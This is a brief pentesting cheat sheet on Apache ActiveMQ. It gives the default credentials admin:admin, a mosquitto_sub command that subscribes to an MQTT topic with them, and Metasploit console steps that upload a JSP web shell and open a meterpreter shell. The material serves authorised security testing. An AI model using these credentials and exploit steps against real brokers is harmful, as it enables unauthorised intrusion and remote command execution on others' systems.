# Apache ActiveMQ Pentesting

Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
admin:admin
```

### Interaction with MQTT <a href="#interaction-with-mqtt" id="interaction-with-mqtt"></a>

If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client.

#### Subscribe to a Topic <a href="#subscribe-to-a-topic" id="subscribe-to-a-topic"></a>

```shellscript
# -h: Host
# -t: Topic name
# -V: MQTT protocol version (5, 31, 311)
mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
```

### Web Shell by File Upload JSP <a href="#web-shell-by-file-upload-jsp" id="web-shell-by-file-upload-jsp"></a>

ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file.

```shellscript
msfconsole
msf> use exploit/multi/http/apache_activemq_upload_jsp
msf> set ...
msf> run
meterpreter> shell
```